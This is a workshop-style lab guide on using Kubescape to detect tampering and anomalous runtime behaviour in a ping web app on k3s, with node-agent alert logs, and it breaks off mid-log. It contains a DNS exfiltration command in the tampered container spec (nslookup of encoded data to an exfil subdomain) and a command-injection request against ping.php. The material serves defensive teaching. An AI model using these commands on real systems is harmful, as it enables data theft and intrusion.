- ← Previous
- Customer - Ingest and verify BoB
Consume the app on client cluster
THIS PART WILL SHOW HOW KUBESCAPE WORKS FOR THE CUSTOMER DURING BOBTEST
Pretending we are now the consumer/user of webapp , we have our own infrastructure.
This consumer uses k3s, which is another slim kubernetes flavour from a different vendor than k0s.
We, ll cover the following
- Get to know our k3s installation
- Deploy kubescape in a slightly different config to give us anomaly detection
- Follow the 2-step installation process
- Watch it for the two types of anomalies
0 Clone repo
Again, lets clone the same repo, this is a fresh playground
git clone https://github.com/k8sstormcenter/honeycluster.git
cd honeycluster
git checkout 152-implement-bill-of-behaviour-demo-lab
1 Install kubescape and wait until it's up and running
make kubescape-bob-kind
kubectl get pods -n honey -l app.kubernetes.io/instance=kubescape
You want the STATUS of all pods to be Running, like so:
laborant@dev-machine:webapp_t$ kubectl get pods -n honey -l app.kubernetes.io/instance=kubescape
NAME READY STATUS RESTARTS AGE
grype-offline-db-579c6cbc47-rvgqk 1/1 Running 0 20m
node-agent-b4qmg 2/2 Running 0 20m
node-agent-tgs8f 2/2 Running 0 20m
node-agent-vslk6 2/2 Running 0 20m
operator-559b868885-kr8dt 1/1 Running 0 20m
storage-79d6fd9785-gdpx2 1/1 Running 0 20m
Check out the Explorer tab Explorer, then navigate to All Objects
and expand, hover and toggle the 👁️-Icon on spdx.softwarecomposition.kubescape.io/v1beta1 -> ApplicationProfile , then navigate to
the bottom Watched Objects . You are now watching for these Application Profiles and no longer need to filter
2 pull down artefact (not yet implemented)
WIP: DO NOT EXECUTE THIS LINE
bobctl install webapp
We will simply use our images k8sstormcenter/webapp:latest and k8sstormcenter/webapp-t:latest
which are multi-arch reproductions of docker.io/amitschendel/ping-app:latest with -t meaning it was tampered.
Their Dockerfiles (and github-workflows)are
3 deploy artefact (first without tampering)
Ok, now we pretend to just install that webapp image , that we as customer think is the correct one.
So, this (will be) the exact same artefact as in Module-1, just on a different tech stack now:
cd traces/kubescape-verify/attacks/webapp/
chmod +x setup.sh
./setup.sh
4 Use the artefact in a functional, benign way
So, we again, do the almost same things:
This app was made for pinging, so we ping
Open a new tab new terminal Let's ping:
curl localhost:8080/ping.php?ip=172.16.0.2
if that works, let it loop
while true; do curl localhost:8080/ping.php?ip=172.16.0.2; sleep 10; done
Do not kill the looping. Please, switch back to the original dev-machine tab, and proceed
5 Wait for kubescape to settle
TODO: replace with more production like method.
We ll wait until we have an application profile again and we ll throw it away, this is not required if you use
exactly the same everything on this kubernetes as you did as the vendor. I.e. if the template-hash matches you
dont need to delete it.
Lets check the configuration in order to understand if the setup is any different from Module 1:
kubectl describe cm -n honey ks-cloud-config
kubectl describe RuntimeRuleAlertBinding all-rules-all-pods
kubectl get applicationProfile -A
laborant@dev-machine:webapp_t$ kubectl get applicationProfile -A
NAMESPACE NAME CREATED AT
default replicaset-webapp-75c688bfc4 2025-04-25T12:38:28Z
export rs=$(kubectl get replicaset -n default -o jsonpath='{.items[0].metadata.name}')
kubectl describe applicationprofile replicaset-$rs
kubectl get applicationProfile replicaset-$rs -o yaml > ~/originalappprofile.yaml
now edit that profile (so it keeps its name), but use the content of the one from Module 1!!!
python3 bob.py
which is the equivalent to manually substituting and patching
echo $rs
envsubst < /home/laborant/honeycluster/traces/kubescape-verify/attacks/webapp/bob_applicationprofile_restart.yaml > /home/laborant/honeycluster/traces/kubescape-verify/attacks/webapp/bob_restart.yaml
patch the ping-profile: (this may or may not be necessary)
kubectl delete applicationprofile replicaset-$rs
kubectl apply -f /home/laborant/honeycluster/traces/kubescape-verify/attacks/webapp/bob_restart.yaml
Make sure you didnt wake the dragon kubescape
kubectl logs -n honey -l app=node-agent
there should be no additional logs, only the stop of the above profile, similar to:
{"level":"info","ts":"2025-04-25T16:25:13Z","msg":"RBCache - ruleBinding added/modified","name":"/all-rules-all-pods"}
{"level":"info","ts":"2025-04-25T17:05:15Z","msg":"start monitor on container","container ID":"d4d78869d6b20066565d10c39fa37d1c6d3d5d83161b4d7b3d75783d53653ae8","k8s workload":"default/webapp-8b697d7f9-h9mx4/ping-app","ContainerImageDigest":"sha256:31eb54dc4f5e3537a807e1a5cbc2de9d6c0a5f4e423a5137627e664748f03d7f","ContainerImageName":"ghcr.io/k8sstormcenter/webapp:latest"}
{"level":"info","ts":"2025-04-25T17:10:15Z","msg":"stop monitor on container - monitoring time ended","container ID":"d4d78869d6b20066565d10c39fa37d1c6d3d5d83161b4d7b3d75783d53653ae8","k8s workload":"default/webapp-8b697d7f9-h9mx4/ping-app"}
Quick Summary:
We as customer deployed webapp, we didnt check its signature, we recorded a profile and threw away that profile by overwriting it with the profile from Module 1, aka BoB.
6 watch how k3s is different from k8s BOB-MERGE
We are still simulating the benign traffic using the loop TODO C : use the bob-test deployment instead. Its already in git.
We already see one interesting log and
notice that there is one syscall different between k8s and k3s, which is the gettid.
7 Discuss what happens if the profile is missing the shutdown
Open a third terminal and:
kubectl logs -n honey -l app=node-agent --tail=-1 -f
back in another terminal:
export pod=$(kubectl get pod -n default -o jsonpath='{.items[0].metadata.name}')
kubectl get pod $pod
kubectl delete pod $pod
switch to the tab of the logs
again it is rerecording the profile again
{"level":"info","ts":"2025-04-25T20:24:06Z","msg":"start monitor on container","container ID":"6f95b220e4e1b06b391c98409682064cf7e9115286792f139c6ca52221a23b85","k8s workload":"default/webapp-8b697d7f9-hxz4v/ping-app","ContainerImageDigest":"sha256:efbbeae81bb8af21288cdda8f0f3de900b73dad19b380937b7374965ee41957f","ContainerImageName":"ghcr.io/k8sstormcenter/webapp:latest"}
{"level":"info","ts":"2025-04-25T20:24:07Z","msg":"stop monitor on container - container has terminated","container ID":"c0cbad967bf756dce1a6716bd39b20250b218a1dfee594c024ab883ad40ab576","k8s workload":"default/webapp-8b697d7f9-wr5s8/ping-app"}
what we see is that we didnt do a rollout restart, but a pod delete
{"BaseRuntimeMetadata":{"alertName":"Unexpected system call","arguments":{"syscall":"gettid"},"infectedPID":4183,"md5Hash":"4e79f11b07df8f72e945e0e3b3587177","sha1Hash":"b361a04dcb3086d0ecf960d3acaa776c62f03a55","severity":1,"size":"730 kB","timestamp":"2025-04-25T20:21:33.310968529Z","trace":{}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"honeycluster","containerName":"ping-app","hostNetwork":false,"namespace":"default","containerID":"c0cbad967bf756dce1a6716bd39b20250b218a1dfee594c024ab883ad40ab576","podName":"webapp-8b697d7f9-wr5s8","podNamespace":"default","workloadName":"webapp","workloadNamespace":"default","workloadKind":"Deployment"},"RuntimeProcessDetails":{"processTree":{"pid":4183,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":3927,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2"},"containerID":"c0cbad967bf756dce1a6716bd39b20250b218a1dfee594c024ab883ad40ab576"},"event":{"runtime":{"runtimeName":"containerd","containerId":"c0cbad967bf756dce1a6716bd39b20250b218a1dfee594c024ab883ad40ab576"},"k8s":{"node":"node-01","namespace":"default","podName":"webapp-8b697d7f9-wr5s8","podLabels":{"app":"webapp","pod-template-hash":"8b697d7f9"},"containerName":"ping-app","owner":{}},"timestamp":1745612493310968529,"type":"normal"},"level":"error","message":"Unexpected system call: gettid","msg":"Unexpected system call","time":"2025-04-25T20:21:33Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected system call","arguments":{"syscall":"tkill"},"infectedPID":4183,"md5Hash":"4e79f11b07df8f72e945e0e3b3587177","sha1Hash":"b361a04dcb3086d0ecf960d3acaa776c62f03a55","severity":1,"size":"730 kB","timestamp":"2025-04-25T20:21:33.313413767Z","trace":{}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"honeycluster","containerName":"ping-app","hostNetwork":false,"namespace":"default","containerID":"c0cbad967bf756dce1a6716bd39b20250b218a1dfee594c024ab883ad40ab576","podName":"webapp-8b697d7f9-wr5s8","podNamespace":"default","workloadName":"webapp","workloadNamespace":"default","workloadKind":"Deployment"},"RuntimeProcessDetails":{"processTree":{"pid":4183,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":3927,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2"},"containerID":"c0cbad967bf756dce1a6716bd39b20250b218a1dfee594c024ab883ad40ab576"},"event":{"runtime":{"runtimeName":"containerd","containerId":"c0cbad967bf756dce1a6716bd39b20250b218a1dfee594c024ab883ad40ab576"},"k8s":{"node":"node-01","namespace":"default","podName":"webapp-8b697d7f9-wr5s8","podLabels":{"app":"webapp","pod-template-hash":"8b697d7f9"},"containerName":"ping-app","owner":{}},"timestamp":1745612493313413767,"type":"normal"},"level":"error","message":"Unexpected system call: tkill","msg":"Unexpected system call","time":"2025-04-25T20:21:33Z"}
But, we again these are just events related to the delete action.
Use the Bill of Behaviour
THIS PART WILL SHOW HOW KUBESCAPE WORKS FOR THE CUSTOMER DURING BOBTEST IF A TAMPERING IS FOUND Now with tampering
3 deploy artefact
cd traces/kubescape-verify/attacks/webapp_t/
chmod +x setup.sh
./setup.sh
if you deployed the tampered one, notice
- args:
- /bin/sh
- -c
- nslookup NjQgYnl0ZXMgZnJvbSAxNzIuMTYuMC4yOiBpY21wX3NlcT0zIHR0bD02MyB0aW1lPTAuNDUzIG1z.exfil.k8sstormcenter.com
> /dev/null 2>&1
path: /bin/sh
Some Usecases
THIS PART WILL SHOW HOW MORE ADVANCED USECASES WORK WIP: currently copy paste from module 1 lesson 3.
spec:
6 architectures:
7 - amd64
8 containers:
9 - capabilities:
10 - NET_RAW
11 - SETUID
12 endpoints: null
13 execs:
14 - args:
15 - /bin/sh
16 - -c
17 - ping -c 4 172.16.0.2
18 path: /bin/sh
19 - args:
20 - /bin/ping
21 - -c
22 - "4"
23 - 172.16.0.2
24 path: /bin/ping
25 imageID: docker.io/amitschendel/ping-app@sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0ca
be8488de77405149c524d
26 imageTag: docker.io/amitschendel/ping-app:latest
27 name: ping-app
28 opens:
29 - flags:
30 - O_CLOEXEC
31 - O_RDONLY
32 path: /usr/lib/x86_64-linux-gnu/libunistring.so.2.1.0
33 - flags:
34 - O_RDONLY
35 path: /var/www/html/ping.php
We want to wait until the status is completed
If the above indicator is green, this means that the following event has been reached by kubescape:
kubectl logs -n honey -l app=node-agent -c node-agent | grep ended
{"level":"info","ts":"2025-04-16T12:06:57Z","msg":"stop monitor on container - monitoring time ended","container ID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","k8s workload":"default/ping-app/ping-app"}
Also, in the crd annotation, you will find the status completed now. The completion is partial, which
we may ignore here (accrd to upstream documentation it means that the app was already started when we were profiling it, but this is what we want in this case)
kubectl describe applicationprofile pod-ping-app
...
...
Annotations: kubescape.io/completion: partial
kubescape.io/instance-id: apiVersion-v1/namespace-default/kind-Pod/name-ping-app
kubescape.io/resource-size: 9
kubescape.io/status: completed
Now, we must save this above file onto disk:
kubectl describe applicationprofile pod-ping-app > pod-ping-app.yaml
Test (this will be moved into the client side)
@Peter: now i need to implement the extract this profile into yaml, attach it to container, sign, push, ....lalala
eventually, a client will do almost the exact same thing, and pull it again, ... this is the sketch of the alert of
malicious behaviour.
So, we are done here, but we could - just for kicks - verify that kubescape is now watching for anything that was not previously recorded as benign .
A malicious runtime behaviour by executing a simple injection like so:
in Tab 1 tail the logs again
kubectl logs -n honey -l app=node-agent -f -c node-agent
and in Tab 2, let's do something malicious
curl 172.16.0.2:$port/ping.php?ip=172.16.0.2,ls
In the other tab, you should now see several unexpected things:
{"BaseRuntimeMetadata":{"alertName":"Unexpected file access","arguments":{"flags":["O_RDONLY","O_CLOEXEC"],"path":"/lib/x86_64-linux-gnu/libnss_files-2.31.so"},"infectedPID":22169,"severity":1,"timestamp":"2025-04-16T12:15:55.810283302Z","trace":{}},"CloudMetadata":null,"RuleID":"R0002","RuntimeK8sDetails":{"clusterName":"honeycluster","containerName":"ping-app","hostNetwork":false,"image":"docker.io/amitschendel/ping-app:latest","imageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d","namespace":"default","containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","podName":"ping-app","podNamespace":"default","workloadName":"ping-app","workloadNamespace":"default","workloadKind":"Pod"},"RuntimeProcessDetails":{"processTree":{"pid":2709,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2486,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":2734,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":22168,"cmdline":"/bin/sh -c ping -c 4 172.16.0.2,ls","comm":"sh","ppid":2734,"pcomm":"apache2","hardlink":"/bin/dash","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/dash","children":[{"pid":22169,"cmdline":"/bin/ping -c 4 172.16.0.2,ls","comm":"ping","ppid":22168,"pcomm":"sh","hardlink":"/bin/ping","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/ping"}]}]}]},"containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924"},"event":{"runtime":{"runtimeName":"containerd","containerId":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","containerName":"ping-app","containerImageName":"docker.io/amitschendel/ping-app:latest","containerImageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d"},"k8s":{"namespace":"default","podName":"ping-app","podLabels":{"app":"ping-app","kubescape.io/max-sniffing-time":"5m"},"containerName":"ping-app","owner":{}},"timestamp":1744805755810283302,"type":"normal"},"level":"error","message":"Unexpected file access: /lib/x86_64-linux-gnu/libnss_files-2.31.so with flags O_RDONLY,O_CLOEXEC","msg":"Unexpected file access","time":"2025-04-16T12:15:55Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected file access","arguments":{"flags":["O_RDONLY","O_CLOEXEC"],"path":"/lib/x86_64-linux-gnu/libnss_dns-2.31.so"},"infectedPID":22169,"severity":1,"timestamp":"2025-04-16T12:15:55.81043552Z","trace":{}},"CloudMetadata":null,"RuleID":"R0002","RuntimeK8sDetails":{"clusterName":"honeycluster","containerName":"ping-app","hostNetwork":false,"image":"docker.io/amitschendel/ping-app:latest","imageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d","namespace":"default","containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","podName":"ping-app","podNamespace":"default","workloadName":"ping-app","workloadNamespace":"default","workloadKind":"Pod"},"RuntimeProcessDetails":{"processTree":{"pid":2709,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2486,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":2734,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":22168,"cmdline":"/bin/sh -c ping -c 4 172.16.0.2,ls","comm":"sh","ppid":2734,"pcomm":"apache2","hardlink":"/bin/dash","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/dash","children":[{"pid":22169,"cmdline":"/bin/ping -c 4 172.16.0.2,ls","comm":"ping","ppid":22168,"pcomm":"sh","hardlink":"/bin/ping","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/ping"}]}]}]},"containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924"},"event":{"runtime":{"runtimeName":"containerd","containerId":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","containerName":"ping-app","containerImageName":"docker.io/amitschendel/ping-app:latest","containerImageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d"},"k8s":{"namespace":"default","podName":"ping-app","podLabels":{"app":"ping-app","kubescape.io/max-sniffing-time":"5m"},"containerName":"ping-app","owner":{}},"timestamp":1744805755810435520,"type":"normal"},"level":"error","message":"Unexpected file access: /lib/x86_64-linux-gnu/libnss_dns-2.31.so with flags O_RDONLY,O_CLOEXEC","msg":"Unexpected file access","time":"2025-04-16T12:15:55Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected file access","arguments":{"flags":["O_RDONLY","O_CLOEXEC"],"path":"/etc/nsswitch.conf"},"infectedPID":22169,"severity":1,"timestamp":"2025-04-16T12:15:55.81019379Z","trace":{}},"CloudMetadata":null,"RuleID":"R0002","RuntimeK8sDetails":{"clusterName":"honeycluster","containerName":"ping-app","hostNetwork":false,"image":"docker.io/amitschendel/ping-app:latest","imageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d","namespace":"default","containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","podName":"ping-app","podNamespace":"default","workloadName":"ping-app","workloadNamespace":"default","workloadKind":"Pod"},"RuntimeProcessDetails":{"processTree":{"pid":2709,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2486,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":2734,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":22168,"cmdline":"/bin/sh -c ping -c 4 172.16.0.2,ls","comm":"sh","ppid":2734,"pcomm":"apache2","hardlink":"/bin/dash","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/dash","children":[{"pid":22169,"cmdline":"/bin/ping -c 4 172.16.0.2,ls","comm":"ping","ppid":22168,"pcomm":"sh","hardlink":"/bin/ping","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/ping"}]}]}]},"containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924"},"event":{"runtime":{"runtimeName":"containerd","containerId":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","containerName":"ping-app","containerImageName":"docker.io/amitschendel/ping-app:latest","containerImageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d"},"k8s":{"namespace":"default","podName":"ping-app","podLabels":{"app":"ping-app","kubescape.io/max-sniffing-time":"5m"},"containerName":"ping-app","owner":{}},"timestamp":1744805755810193790,"type":"normal"},"level":"error","message":"Unexpected file access: /etc/nsswitch.conf with flags O_RDONLY,O_CLOEXEC","msg":"Unexpected file access","time":"2025-04-16T12:15:55Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected file access","arguments":{"flags":["O_RDONLY","O_CLOEXEC"],"path":"/etc/host.conf"},"infectedPID":22169,"severity":1,"timestamp":"2025-04-16T12:15:55.810226967Z","trace":{}},"CloudMetadata":null,"RuleID":"R0002","RuntimeK8sDetails":{"clusterName":"honeycluster","containerName":"ping-app","hostNetwork":false,"image":"docker.io/amitschendel/ping-app:latest","imageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d","namespace":"default","containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","podName":"ping-app","podNamespace":"default","workloadName":"ping-app","workloadNamespace":"default","workloadKind":"Pod"},"RuntimeProcessDetails":{"processTree":{"pid":2709,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2486,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":2734,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":22168,"cmdline":"/bin/sh -c ping -c 4 172.16.0.2,ls","comm":"sh","ppid":2734,"pcomm":"apache2","hardlink":"/bin/dash","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/dash","children":[{"pid":22169,"cmdline":"/bin/ping -c 4 172.16.0.2,ls","comm":"ping","ppid":22168,"pcomm":"sh","hardlink":"/bin/ping","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/ping"}]}]}]},"containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924"},"event":{"runtime":{"runtimeName":"containerd","containerId":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","containerName":"ping-app","containerImageName":"docker.io/amitschendel/ping-app:latest","containerImageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d"},"k8s":{"namespace":"default","podName":"ping-app","podLabels":{"app":"ping-app","kubescape.io/max-sniffing-time":"5m"},"containerName":"ping-app","owner":{}},"timestamp":1744805755810226967,"type":"normal"},"level":"error","message":"Unexpected file access: /etc/host.conf with flags O_RDONLY,O_CLOEXEC","msg":"Unexpected file access","time":"2025-04-16T12:15:55Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected file access","arguments":{"flags":["O_RDONLY","O_CLOEXEC"],"path":"/etc/resolv.conf"},"infectedPID":22169,"severity":1,"timestamp":"2025-04-16T12:15:55.81024497Z","trace":{}},"CloudMetadata":null,"RuleID":"R0002","RuntimeK8sDetails":{"clusterName":"honeycluster","containerName":"ping-app","hostNetwork":false,"image":"docker.io/amitschendel/ping-app:latest","imageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d","namespace":"default","containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","podName":"ping-app","podNamespace":"default","workloadName":"ping-app","workloadNamespace":"default","workloadKind":"Pod"},"RuntimeProcessDetails":{"processTree":{"pid":2709,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2486,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":2734,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":22168,"cmdline":"/bin/sh -c ping -c 4 172.16.0.2,ls","comm":"sh","ppid":2734,"pcomm":"apache2","hardlink":"/bin/dash","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/dash","children":[{"pid":22169,"cmdline":"/bin/ping -c 4 172.16.0.2,ls","comm":"ping","ppid":22168,"pcomm":"sh","hardlink":"/bin/ping","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/ping"}]}]}]},"containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924"},"event":{"runtime":{"runtimeName":"containerd","containerId":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","containerName":"ping-app","containerImageName":"docker.io/amitschendel/ping-app:latest","containerImageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d"},"k8s":{"namespace":"default","podName":"ping-app","podLabels":{"app":"ping-app","kubescape.io/max-sniffing-time":"5m"},"containerName":"ping-app","owner":{}},"timestamp":1744805755810244970,"type":"normal"},"level":"error","message":"Unexpected file access: /etc/resolv.conf with flags O_RDONLY,O_CLOEXEC","msg":"Unexpected file access","time":"2025-04-16T12:15:55Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected file access","arguments":{"flags":["O_RDONLY","O_CLOEXEC"],"path":"/etc/hosts"},"infectedPID":22169,"severity":1,"timestamp":"2025-04-16T12:15:55.810352331Z","trace":{}},"CloudMetadata":null,"RuleID":"R0002","RuntimeK8sDetails":{"clusterName":"honeycluster","containerName":"ping-app","hostNetwork":false,"image":"docker.io/amitschendel/ping-app:latest","imageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d","namespace":"default","containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","podName":"ping-app","podNamespace":"default","workloadName":"ping-app","workloadNamespace":"default","workloadKind":"Pod"},"RuntimeProcessDetails":{"processTree":{"pid":2709,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2486,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":2734,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":22168,"cmdline":"/bin/sh -c ping -c 4 172.16.0.2,ls","comm":"sh","ppid":2734,"pcomm":"apache2","hardlink":"/bin/dash","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/dash","children":[{"pid":22169,"cmdline":"/bin/ping -c 4 172.16.0.2,ls","comm":"ping","ppid":22168,"pcomm":"sh","hardlink":"/bin/ping","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","upperLayer":false,"cwd":"/var/www/html","path":"/bin/ping"}]}]}]},"containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924"},"event":{"runtime":{"runtimeName":"containerd","containerId":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","containerName":"ping-app","containerImageName":"docker.io/amitschendel/ping-app:latest","containerImageDigest":"sha256:99fe0f297bbaeca1896219486de8d777fa46bd5b0cabe8488de77405149c524d"},"k8s":{"namespace":"default","podName":"ping-app","podLabels":{"app":"ping-app","kubescape.io/max-sniffing-time":"5m"},"containerName":"ping-app","owner":{}},"timestamp":1744805755810352331,"type":"normal"},"level":"error","message":"Unexpected file access: /etc/hosts with flags O_RDONLY,O_CLOEXEC","msg":"Unexpected file access","time":"2025-04-16T12:15:55Z"}
{"BaseRuntimeMetadata":{"alertName":"Unexpected system call","arguments":{"syscall":"lseek"},"infectedPID":2709,"md5Hash":"4e79f11b07df8f72e945e0e3b3587177","sha1Hash":"b361a04dcb3086d0ecf960d3acaa776c62f03a55","severity":1,"size":"730 kB","timestamp":"2025-04-16T12:15:58.411292178Z","trace":{}},"CloudMetadata":null,"RuleID":"R0003","RuntimeK8sDetails":{"clusterName":"honeycluster","containerName":"ping-app","hostNetwork":false,"namespace":"default","containerID":"8ac882eefce545c63fdad8d090f7d6074389301c0474b9aed810f207fa62e924","podName":"ping-app","podNamespace":"default","workloadName":"ping-app","workloadNamespace":"default","workloadKind":"Pod"},"RuntimeProcessDetails":{"processTree":{"pid":2709,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2486,"pcomm":"containerd-shim","uid":0,"gid":0,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":15237,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2"},{"pid":2733,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2"},{"pid":2735,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2"},{"pid":2734,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2"},{"pid":2737,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2"},{"pid":2736,"cmdline":"apache2 -DFOREGROUND","comm":"apache2","ppid":2709,"pcomm":"apache2","uid":33,"gid":33,"startTime":"0001-01-01T00:00:00Z","cwd":"/var/www/html","path":"/usr/sbin/apache2","children":[{"pid":19194,"cmdline":"sh -c ping -c 4 